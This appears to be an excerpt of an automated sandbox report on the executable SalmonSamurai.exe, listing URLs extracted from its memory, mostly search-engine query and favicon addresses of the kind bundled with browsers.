Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-hpkp-report-only
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-hpkp-report-only#
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://dts.search-results.com/sr?lng=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://find.in.gr/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.pnghttp://find.in.gr/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://g1.delphi.lv/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://g1.delphi.lv/favicon.icohttp://www.delfi.lv/search_all/?ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://i.rl0.ru/2011/icons/rambler.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://i.rl0.ru/2011/icons/rambler.icohttp://nova.rambler.ru/search?query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://i.wp.pl/a/i/stg/500/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://i.wp.pl/a/i/stg/500/favicon.icohttp://szukaj.wp.pl/szukaj.html?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://imgs.sapo.pt/images/sapo.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://imgs.sapo.pt/images/sapo.icohttp://pesquisa.sapo.pt/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://l.twimg.com/i/hpkp_report
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://l.twimg.com/i/hpkp_report0
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://linkurystoragenorthus.blob.core.windows.net/static/favicon.icohttp://search.snapdo.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.icohttp://arianna.libero.it/search/ab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/?s=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nova.rambler.ru/search?query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nova.rambler.ru/suggest?v=3&query=
Source: SalmonSamurai.exe, 00000000.00000000.1256527562.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/katalogus?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://pesquisa.sapo.pt/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://pesquisa.sapo.pt/livesapo?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://radce.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://report-example.test/test
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/favicon.icohttp://search.avg.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/favicon.icohttp://search.babylon.com/home?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/home?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/favicon.icohttp://search.imesh.net/music?hl=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/music?hl=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.icohttp://search.iminent.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/favicon.icohttp://search.incredibar.com/search.php?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/search.php?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.snapdo.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.icohttp://search.softonic.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/favicon.icohttp://search.sweetim.com/search.asp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/search.asp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/?ru=1&query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/favicon.icohttp://search.tut.by/?ru=1&query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.walla.co.il/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.icohttp://searchfunmoods.com/results.php?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/results.php?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.icohttp://start.sweetpacks.com/search.asp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/search.asp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?p
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://szukaj.wp.pl/szukaj.html?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/favicon.icohttp://www.conduit.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delfi.lv/search_all/?ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/favicon.icohttp://www.delta-search.com/home?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/home?q=
